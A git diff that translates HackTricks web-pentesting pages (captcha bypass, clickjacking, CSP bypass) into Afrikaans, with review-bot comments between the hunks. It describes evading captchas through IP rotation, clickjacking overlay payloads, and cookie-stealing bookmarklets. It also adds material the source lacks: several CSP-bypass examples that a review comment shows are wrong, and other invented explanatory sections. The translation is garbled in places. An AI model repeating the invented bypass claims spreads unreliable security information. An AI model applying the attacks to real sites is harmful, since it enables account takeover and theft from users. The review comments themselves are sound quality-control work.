+Let op dat de **cache-proxy** moet worden **geconfigureerd** om bestanden **te cachen** op basis van de **extensie** van het bestand (_.css_) en niet op basis van het content-type. In het voor +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception). +Ander maniere om HackTricks te ondersteun: -## References - -* [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning) -* [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities) -* [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712) -* [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/) -* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) -* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/) - -
- -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag. diff --git a/pentesting-web/captcha-bypass.md b/pentesting-web/captcha-bypass.md index 831f168fe..284268a89 100644 --- a/pentesting-web/captcha-bypass.md +++ b/pentesting-web/captcha-bypass.md @@ -1,67 +1,67 @@ -# Captcha Bypass +# Captcha Omspring
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Captcha Bypass +## Captcha Omspring -To **bypass** the captcha during **server testing** and automate user input functions, various techniques can be employed. The objective is not to undermine security but to streamline the testing process. Here's a comprehensive list of strategies: +Om die captcha tydens bedienertoetsing te **omspring** en gebruikersinvoerfunksies outomaties te maak, kan verskeie tegnieke gebruik word. Die doel is nie om sekuriteit te ondermyn nie, maar om die toetsproses te stroomlyn. Hier is 'n omvattende lys van strategieë: -1. **Parameter Manipulation**: - * **Omit the Captcha Parameter**: Avoid sending the captcha parameter. Experiment with changing the HTTP method from POST to GET or other verbs, and altering the data format, such as switching between form data and JSON. - * **Send Empty Captcha**: Submit the request with the captcha parameter present but left empty. +1. **Parametermanipulasie**: +* **Laat die Captcha-parameter weg**: Vermy om die captcha-parameter te stuur. Eksperimenteer met die verandering van die HTTP-metode van POST na GET of ander werkwoorde, en verander die dataformaat, soos oorskakel tussen vormdata en JSON. +* **Stuur 'n leë Captcha**: Stuur die versoek met die captcha-parameter teenwoordig, maar leeg gelaat. -2. **Value Extraction and Reuse**: - * **Source Code Inspection**: Search for the captcha value within the page's source code. - * **Cookie Analysis**: Examine the cookies to find if the captcha value is stored and reused. - * **Reuse Old Captcha Values**: Attempt to use previously successful captcha values again. - * **Session Manipulation**: Try using the same captcha value across different sessions or the same session ID. +2. **Waarde-ekstraksie en hergebruik**: +* **Bronkode-inspeksie**: Soek na die captcha-waarde binne die bronkode van die bladsy. +* **Koekie-analise**: Ondersoek die koekies om te bepaal of die captcha-waarde gestoor en hergebruik word. 
+* **Hergebruik ou Captcha-waardes**: Probeer om voorheen suksesvolle captcha-waardes weer te gebruik. +* **Sessie-manipulasie**: Probeer om dieselfde captcha-waarde oor verskillende sessies of dieselfde sessie-ID te gebruik. -3. **Automation and Recognition**: - * **Mathematical Captchas**: If the captcha involves math operations, automate the calculation process. - * **Image Recognition**: - * For captchas that require reading characters from an image, manually or programmatically determine the total number of unique images. If the set is limited, you might identify each image by its MD5 hash. - * Utilize Optical Character Recognition (OCR) tools like [Tesseract OCR](https://github.com/tesseract-ocr/tesseract) to automate character reading from images. +3. **Outomatisering en herkenning**: +* **Wiskundige Captchas**: As die captcha wiskundige bewerkings behels, outomatiseer die berekeningsproses. +* **Beeldherkenning**: +* Vir captchas wat vereis dat karakters van 'n beeld gelees word, bepaal die totale aantal unieke beelde handmatig of programmaties. As die stel beperk is, kan jy elke beeld identifiseer aan die hand van sy MD5-hash. +* Gebruik optiese karakterherkenning (OCR)-hulpmiddels soos [Tesseract OCR](https://github.com/tesseract-ocr/tesseract) om karakters outomaties van beelde te lees. -4. **Additional Techniques**: - * **Rate Limit Testing**: Check if the application limits the number of attempts or submissions in a given timeframe and whether this limit can be bypassed or reset. - * **Third-party Services**: Employ captcha-solving services or APIs that offer automated captcha recognition and solving. - * **Session and IP Rotation**: Frequently change session IDs and IP addresses to avoid detection and blocking by the server. - * **User-Agent and Header Manipulation**: Alter the User-Agent and other request headers to mimic different browsers or devices. 
- * **Audio Captcha Analysis**: If an audio captcha option is available, use speech-to-text services to interpret and solve the captcha. +4. **Addisionele Tegnieke**: +* **Tarieflimiettoetsing**: Kyk of die toepassing die aantal pogings of indienings binne 'n gegewe tydperk beperk en of hierdie limiet omseil of herstel kan word. +* **Derdeparty-dienste**: Maak gebruik van captcha-oplossingsdienste of API's wat outomatiese captcha-herkenning en -oplossing bied. +* **Sessie- en IP-rotasie**: Verander gereeld sessie-IDs en IP-adresse om opsporing en blokkering deur die bediener te voorkom. +* **Gebruikersagent- en kopmanipulasie**: Verander die Gebruikersagent en ander versoekkoppe om verskillende webblaaier of toestelle na te boots. +* **Audio Captcha-analise**: As 'n klankcaptcha-opsie beskikbaar is, gebruik spraak-na-tekshulpmiddels om die captcha te interpreteer en op te los. -## Online Services to bypass captchas +## Aanlyn Dienste om captchas te omspring ### [Capsolver](https://www.capsolver.com/) -Capsolver‘s automatic captcha solver offers the **most affordable and quick captcha-solving solution**. You may rapidly combine it with your program using its simple integration option to achieve the best results in a matter of seconds. +Capsolver se outomatiese captcha-oplosser bied die **mees bekostigbare en vinnige oplossing vir captchas**. Jy kan dit vinnig saamvoeg met jou program deur middel van die eenvoudige integrasie-opsie om die beste resultate binne sekondes te behaal. -With a success rate of 99.15%, Capsolver can **answer more than 10M captchas every minute**. This implies that your automation or scrape will have a 99.99% uptime. You may buy a captcha package if you have a large budget. +Met 'n sukseskoers van 99.15% kan Capsolver **meer as 10M captchas elke minuut oplos**. Dit beteken dat jou outomatisering of skraping 'n 99.99% beskikbaarheid sal hê. As jy 'n groot begroting het, kan jy 'n captcha-pakket koop. 
-At the lowest price on the market, you may receive a variety of solutions, including reCAPTCHA V2, reCAPTCHA V3, hCaptcha, hCaptcha Click, reCaptcha click, Funcaptcha Click, FunCaptcha, datadome captcha, aws captcha, picture-to-text, binance / coinmarketcap captcha, geetest v3 / v3, and more. With this service, **0.1s is the slowest speed ever measured**. +Teen die laagste prys op die mark kan jy 'n verskeidenheid oplossings ontvang, insluitend reCAPTCHA V2, reCAPTCHA V3, hCaptcha, hCaptcha Click, reCaptcha click, Funcaptcha Click, FunCaptcha, datadome captcha, aws captcha, prentjie-na-tekst, binance / coinmarketcap captcha, geetest v3 / v3, en meer. Met hierdie diens is **0.1s die stadigste spoed wat ooit gemeet is**.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
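Review bot: the sub-bullets under the numbered items in captcha-bypass.md lose their indentation. The removed lines read `   * **Omit the Captcha Parameter**: ...` with three leading spaces, while the added lines start at column zero, `+* **Laat die Captcha-parameter weg**: ...`, so the four numbered groups will render as flat top-level bullets and the numbering will break; re-indent every `*` line under items 1 to 4 by the same three spaces as the source. Smaller points in the same hunk: "Tarieflimiettoetsing" reads as a price limit, and a "tempo"-based term is closer to what "rate limit" means here; "verskillende webblaaier of toestelle" needs the plural "webblaaiers". The shared footer is also worded differently from the cache-deception page of this same PR ("hacktruuks"/"github-repos" there versus "hacking-truuks"/"github-opslag" here); pick one rendering for the header and footer so that future updates to them stay mechanical.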
diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md index 4453801de..22461274c 100644 --- a/pentesting-web/clickjacking.md +++ b/pentesting-web/clickjacking.md @@ -2,89 +2,184 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## What is Clickjacking +## Wat is Clickjacking -In a clickjacking attack, a **user** is **tricked** into **clicking** an **element** on a webpage that is either **invisible** or disguised as a different element. This manipulation can lead to unintended consequences for the user, such as the downloading of malware, redirection to malicious web pages, provision of credentials or sensitive information, money transfers, or the online purchasing of products. +In 'n clickjacking-aanval word 'n **gebruiker** **bedrieg** om op 'n **element** op 'n webblad te **klik** wat óf **onsigbaar** is óf vermom is as 'n ander element. Hierdie manipulasie kan onbedoelde gevolge vir die gebruiker hê, soos die aflaai van kwaadwillige sagteware, omleiding na skadelike webbladsye, die voorsiening van geloofsbriewe of sensitiewe inligting, geldoordragte, of die aanlyn-aankoop van produkte. -### Prepopulate forms trick +### Trick om vorms vooraf te vul -Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviour to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit. +Dit is soms moontlik om die waarde van velds in 'n vorm te **vul deur GET-parameters te gebruik wanneer 'n bladsy gelaai word**. 
'n Aanvaller kan hierdie gedrag misbruik om 'n vorm met willekeurige data te vul en die clickjacking-lading te stuur sodat die gebruiker die knoppie Indien druk. -### Populate form with Drag\&Drop +### Vul vorm met Sleep\&Laat val -If you need the user to **fill a form** but you don't want to directly ask him to write some specific information (like the email and or specific password that you know), you can just ask him to **Drag\&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/). - -### Basic Payload +As jy wil hê dat die gebruiker 'n vorm moet **vul**, maar jy wil hom nie direk vra om spesifieke inligting te skryf (soos die e-pos en/of 'n spesifieke wagwoord wat jy weet nie), kan jy hom net vra om iets te **Sleep\&Laat val** wat jou beheerde data sal skryf, soos in [**hierdie voorbeeld**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/). +### Basiese Lading ```markup
Click me
``` +### Veelstapgelaai -### Multistep Payload +'n Veelstapgelaai is 'n tegniek wat gebruik word in clickjacking-aanvalle om 'n gebruiker te mislei om 'n reeks aksies uit te voer sonder dat hy bewus is daarvan. Hierdie tegniek maak gebruik van 'n reeks versteekte kliekareas wat oor mekaar gelê word om die gebruiker te laat dink dat hy op 'n ander element klik as wat hy werklik is. +Die veelstapgelaai bestaan uit die volgende stappe: + +1. Die aanvaller skep 'n webwerf wat die inhoud van die teikenwebwerf insluit deur gebruik te maak van 'n iframe-element. +2. Die aanvaller plaas 'n onsigbare kliekarea oor 'n knoppie of skakel op die teikenwebwerf wat die gebruiker normaalweg sou klik. +3. Wanneer die gebruiker op die knoppie of skakel klik, word hy eintlik op die onsigbare kliekarea geklik, wat 'n aksie op die teikenwebwerf veroorsaak. +4. Die aanvaller kan hierdie proses herhaal deur nog versteekte kliekareas oor ander elemente op die teikenwebwerf te plaas, wat die gebruiker verder mislei om aksies uit te voer sonder sy medewete. + +Hierdie tegniek kan gebruik word om verskeie skadelike aksies uit te voer, soos die stel van gebruikersinstellings, die uitvoer van transaksies of die deel van persoonlike inligting sonder die gebruiker se toestemming. Dit is belangrik vir webontwikkelaars om bewus te wees van hierdie aanvalstegniek en maatreëls te tref om dit te voorkom. ```markup
Click me first
Click me next
``` +### Sleep\&Laai + Klik lading -### Drag\&Drop + Click payload +Hierdie tegniek maak gebruik van 'n kombinasie van sleep en laai en kliek om 'n clickjacking-aanval uit te voer. Die aanval maak gebruik van 'n onsigbare oorlê-element wat die gebruiker mislei om op 'n skadelike knoppie te klik sonder dat hy dit besef. +#### Metode + +1. Skep 'n oorlê-element wat die volle skerm bedek en 'n skadelike knoppie bevat. +2. Stel die oorlê-element se deursigtigheid in op 0% sodat dit onsigbaar is vir die gebruiker. +3. Plaas die oorlê-element oor 'n onskadelike knoppie of skakel wat die gebruiker verwag om op te klik. +4. Skep 'n sleep-en-laai-gebeurtenis wat geaktiveer word wanneer die gebruiker op die onskadelike knoppie klik. +5. Tydens die sleep-en-laai-gebeurtenis, skuif die oorlê-element oor die skadelike knoppie. +6. Wanneer die gebruiker die muisknop loslaat, sal die oorlê-element oor die skadelike knoppie wees en die aanval sal uitgevoer word. + +#### Voorbeeld + +```html + + + + + + +
+
Skadelike Knoppie
+
+
Onskadelike Knoppie
+ + + +``` + +In hierdie voorbeeld sal die gebruiker verwag om op die groen "Onskadelike Knoppie" te klik. Wanneer die gebruiker die knoppie klik, sal die oorlê-element oor die rooi "Skadelike Knoppie" skuif en die aanval sal uitgevoer word sonder dat die gebruiker dit besef. ```markup 
@@ -113,105 +208,96 @@ background: #F00; ``` +### XSS + Klikverleiding -### XSS + Clickjacking +As jy 'n **XSS-aanval geïdentifiseer het wat vereis dat 'n gebruiker op 'n element klik** om die XSS te **aktiveer** en die bladsy is **kwesbaar vir klikverleiding**, kan jy dit misbruik om die gebruiker te mislei om op die knoppie/skakel te klik.\ +Voorbeeld:\ +_Jy het 'n **self XSS** gevind in sekere privaat besonderhede van die rekening (besonderhede wat **slegs jy kan instel en lees**). Die bladsy met die **vorm** om hierdie besonderhede in te stel is **kwesbaar** vir **klikverleiding** en jy kan die **vorm** vooraf vul met die GET parameters._\ +__'n Aanvaller kan 'n **klikverleiding**-aanval vir daardie bladsy voorberei deur die **vorm** vooraf te vul met die **XSS-payload** en die **gebruiker te mislei** om die **vorm in te dien**. So, **wanneer die vorm ingedien word** en die waardes gewysig word, sal die **gebruiker die XSS uitvoer**. -If you have identified an **XSS attack that requires a user to click** on some element to **trigger** the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.\ -Example:\ -_You found a **self XSS** in some private details of the account (details that **only you can set and read**). The page with the **form** to set these details is **vulnerable** to **Clickjacking** and you can **prepopulate** the **form** with the GET parameters._\ -\_\_An attacker could prepare a **Clickjacking** attack to that page **prepopulating** the **form** with the **XSS payload** and **tricking** the **user** into **Submit** the form. So, **when the form is submitted** and the values are modified, the **user will execute the XSS**. 
+## Strategieë om Klikverleiding te Verminder -## Strategies to Mitigate Clickjacking +### Kliëntkant Verdediging -### Client-Side Defenses +Skripte wat aan die kliëntkant uitgevoer word, kan aksies uitvoer om Klikverleiding te voorkom: -Scripts executed on the client side can perform actions to prevent Clickjacking: +* Verseker dat die aansoekvenster die hoofvenster is. +* Maak alle rame sigbaar. +* Voorkom kliek op onsigbare rame. +* Ontdek en waarsku gebruikers vir moontlike Klikverleiding-pogings. -* Ensuring the application window is the main or top window. -* Making all frames visible. -* Preventing clicks on invisible frames. -* Detecting and alerting users to potential Clickjacking attempts. - -However, these frame-busting scripts may be circumvented: - -* **Browsers' Security Settings:** Some browsers might block these scripts based on their security settings or lack of JavaScript support. -* **HTML5 iframe `sandbox` Attribute:** An attacker can neutralize frame buster scripts by setting the `sandbox` attribute with `allow-forms` or `allow-scripts` values without `allow-top-navigation`. This prevents the iframe from verifying if it is the top window, e.g., +Hierdie raam-breuk skripte kan egter omseil word: +* **Webblaaier se Sekuriteitsinstellings:** Sommige webblaaier kan hierdie skripte blokkeer gebaseer op hul sekuriteitsinstellings of gebrek aan JavaScript-ondersteuning. +* **HTML5 iframe `sandbox` Eienskap:** 'n Aanvaller kan raam-breuk skripte neutraliseer deur die `sandbox` eienskap in te stel met `allow-forms` of `allow-scripts` waardes sonder `allow-top-navigation`. Dit voorkom dat die iframe verifieer of dit die hoofvenster is, bv., ```html ``` +Die `allow-forms` en `allow-scripts` waardes maak aksies binne die iframe moontlik terwyl top-level navigasie uitgeskakel word. 
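Review bot: terminology switches mid-file. The first hunk of clickjacking.md uses "Clickjacking" and "clickjacking-aanval" (`+## Wat is Clickjacking`), while this hunk renders the same term as "Klikverleiding" (`+### XSS + Klikverleiding`, `+## Strategieë om Klikverleiding te Verminder`). Use one term throughout the file; keeping the English name and giving the Afrikaans gloss once in the definition paragraph is the least confusing option. The stray `__` at the start of `+__'n Aanvaller kan 'n **klikverleiding**-aanval ...` is carried over from the escaped `\_\_` in the source, has no closing pair and renders as literal underscores; drop it rather than translate it.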
Om die beoogde funksionaliteit van die geteikende webwerf te verseker, mag addisionele toestemmings soos `allow-same-origin` en `allow-modals` nodig wees, afhangende van die tipe aanval. Blaaierkonsole-boodskappe kan aandui watter toestemmings toegelaat moet word. -The `allow-forms` and `allow-scripts` values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like `allow-same-origin` and `allow-modals` might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow. - -### Server-Side Defenses +### Bedienerkant-verdedigings #### X-Frame-Options -The **`X-Frame-Options` HTTP response header** informs browsers about the legitimacy of rendering a page in a `` or ` +``` + +Hierdie voorbeeld wys hoe om die CSP te omseil deur die `sandbox`-kenmerk te gebruik. Die `sandbox`-waarde van `allow-scripts` laat toe dat skripte binne die `iframe`-element uitgevoer word, selfs as dit teenstrydig is met die beleid van die omliggende webbladsy. + +- Bypassing via `data:` URL: + +```html + +``` + +Hierdie voorbeeld wys hoe om die CSP te omseil deur die `data:`-URL-skema te gebruik. Die skripskakel verwys na 'n data-URL wat die skripskode bevat. Hierdie omseiling laat toe dat die skripskode uitgevoer word, selfs as dit nie toegelaat word volgens die beleid nie. + +- Bypassing via `nonce` attribute: + +```html + +``` + +Hierdie voorbeeld wys hoe om die CSP te omseil deur die `nonce`-kenmerk te gebruik. Die `nonce`-waarde moet ooreenstem met die waarde wat deur die webwerf se beleid gespesifiseer word. Hierdie omseiling laat toe dat die skripskakel gelaai word, selfs as dit nie toegelaat word volgens die beleid nie. 
```xml ``` +### Koptekste -### Headers +CSP kan afgedwing of gemonitor word deur middel van hierdie koptekste: -CSP can be enforced or monitored using these headers: +* `Content-Security-Policy`: Dwang die CSP af; die blaaier blokkeer enige oortredings. +* `Content-Security-Policy-Report-Only`: Word gebruik vir monitering; rapporteer oortredings sonder om dit te blokkeer. Ideaal vir toetsing in pre-produksie omgewings. -* `Content-Security-Policy`: Enforces the CSP; the browser blocks any violations. -* `Content-Security-Policy-Report-Only`: Used for monitoring; reports violations without blocking them. Ideal for testing in pre-production environments. - -### Defining Resources - -CSP restricts the origins for loading both active and passive content, controlling aspects like inline JavaScript execution and the use of `eval()`. An example policy is: +### Definisie van Hulpbronne +CSP beperk die oorspronge vir die laai van beide aktiewe en passiewe inhoud, en beheer aspekte soos inline JavaScript-uitvoering en die gebruik van `eval()`. 'n Voorbeeldbeleid is: ```bash default-src 'none'; img-src 'self'; 
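Review bot: the three "bypass" examples at the top of this hunk (the `sandbox` attribute, the `data:` URL and the `nonce` attribute) have no counterpart on the `-` side and are not part of the source page, and what they claim is wrong. A `sandbox="allow-scripts"` iframe does not exempt the framed document from the CSP delivered with its own response; a `data:` URL in `src` is blocked unless `script-src` explicitly allows the `data:` scheme; and a matching `nonce` is exactly what the policy is designed to require, so none of the three "omseil" the policy as the added paragraphs say. Remove these generated sections so the hunk stays a translation. In the header list, `+* \`Content-Security-Policy\`: Dwang die CSP af;` should read "Dwing die CSP af".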
@@ -69,62 +102,54 @@ frame-src 'self' https://ic.paypal.com https://paypal.com; media-src https://videos.cdn.mozilla.net; object-src 'none'; ``` +### Riglyne -### Directives - -* **script-src**: Allows specific sources for JavaScript, including URLs, inline scripts, and scripts triggered by event handlers or XSLT stylesheets. -* **default-src**: Sets a default policy for fetching resources when specific fetch directives are absent. -* **child-src**: Specifies allowed resources for web workers and embedded frame contents. -* **connect-src**: Restricts URLs which can be loaded using interfaces like fetch, WebSocket, XMLHttpRequest. -* **frame-src**: Restricts URLs for frames. -* **frame-ancestors**: Specifies which sources can embed the current page, applicable to elements like ``, ` // The bot will load an URL with the payload ``` +### Via Bladwijzers -### Via Bookmarklets +Hierdie aanval vereis 'n bietjie sosiale ingenieurswese waar die aanvaller die gebruiker oortuig om 'n skakel oor die bladwijzer van die webblaaier te sleep en te laat val. Hierdie bladwijzer sal **boosaardige javascript**-kode bevat wat uitgevoer sal word in die konteks van die huidige webvenster, **CSP omseil en die diefstal van sensitiewe inligting soos koekies of tokens toelaat**. -This attack would imply some social engineering where the attacker **convinces the user to drag and drop a link over the bookmarklet of the browser**. This bookmarklet would contain **malicious javascript** code that when drag\&dropped or clicked would be executed in the context of the current web window, **bypassing CSP and allowing to steal sensitive information** such as cookies or tokens. +Vir meer inligting [**kyk die oorspronklike verslag hier**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/). -For more information [**check the original report here**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/). 
+### CSP-omseiling deur beperking van CSP -### CSP bypass by restricting CSP +In [**hierdie CTF-verslag**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution) word CSP omseil deur 'n meer beperkende CSP in te spuit binne 'n toegelate ifram wat die laai van 'n spesifieke JS-lêer verbied. Hierdie lêer maak dit dan moontlik om deur middel van **prototipeverontreiniging** of **dom-verontreiniging** 'n ander skrip te misbruik om 'n willekeurige skrip te laai. -In [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP is bypassed by injecting inside an allowed iframe a more restrictive CSP that disallowed to load a specific JS file that, then, via **prototype pollution** or **dom clobbering** allowed to **abuse a different script to load an arbitrary script**. - -You can **restrict a CSP of an Iframe** with the **`csp`** attribute: +Jy kan **'n CSP van 'n Iframe beperk** met die **`csp`**-eienskap: {% code overflow="wrap" %} ```html 
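Review bot: `+### Riglyne` for "### Directives" means "guidelines"; CSP directives are "direktiewe", and the heading should say so. The visible `+` side of this hunk has no translated counterpart for the removed `script-src`, `default-src`, `child-src`, `connect-src`, `frame-src` and `frame-ancestors` definitions; confirm they are present in the full hunk rather than dropped. Also `toegelate ifram` should be `iframe`, and "Bladwijzers" is the Dutch word; either use the Afrikaans "boekmerk" or keep "bookmarklet" as the technical term the way the source does.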
